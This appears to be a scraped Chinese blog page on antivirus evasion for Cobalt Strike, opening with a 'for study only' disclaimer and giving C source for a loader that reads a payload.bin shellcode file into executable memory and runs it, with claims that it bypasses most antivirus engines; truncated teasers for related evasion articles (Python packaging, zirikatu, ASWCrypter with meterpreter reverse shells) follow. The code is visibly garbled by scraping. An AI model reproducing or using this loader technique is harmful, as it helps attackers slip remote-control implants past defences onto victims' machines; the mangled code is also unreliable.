本文章僅用於交流學習,由於傳播、利用此文所提供的資訊而造成的任何直接或者間接的後果及損失,均由使用者本人負責,文章作者不為此承擔任何責任
1.編譯好mian.exe,原始碼如下
#include
#include
intmain
(int argc,
char
* ar**)
dword dwsize =0;
//獲取shellcode的總大小
dwsize =
getfilesize
(hfile,
null);
//申請一塊可讀可寫可執行的記憶體
lpvoid lpaddress =
virtualalloc
(null
, dwsize, mem_commit, page_execute_readwrite);if
(lpaddress ==
null
)//將檔案讀取到申請的記憶體中
dword dwread =0;
readfile
(hfile, lpaddress, dwsize,
&dwread,0)
;//執行shellcode
__asm
return0;
}
2.cs生成payload.bin,此bin檔案多數殺軟不查殺的,思路就是利用mian.exe來執行payload.bin上線cs。
注:payload.bin和mian.exe要處於同一目錄下
火絨
vt查殺70/1
cs免殺 使用python進行免殺
使用python版本為python3.6 32位版本,64位版本測試會報錯。安裝pyinstaller,pywin32 pip3 install pyinstaller pip3 install pywin32 使用cobalsstrike生成c語言shellcode。shellcode 放這個位置...
遠控免殺專題 13 zirikatu免殺
0x01 免殺能力一覽表 幾點說明 1 上表中標識 說明相應防毒軟體未檢測出病毒,也就是代表了bypass。2 為了更好的對比效果,大部分測試payload均使用msf的windows meterperter reverse tcp模組生成。3 由於本機測試時只是安裝了360全家桶和火絨,所以預設情...
遠控免殺專題 18 ASWCrypter免殺
免殺能力一覽表 幾點說明 1 上表中標識 說明相應防毒軟體未檢測出病毒,也就是代表了bypass。2 為了更好的對比效果,大部分測試payload均使用msf的windows meterperter reverse tcp模組生成。3 由於本機測試時只是安裝了360全家桶和火絨,所以預設情況下360...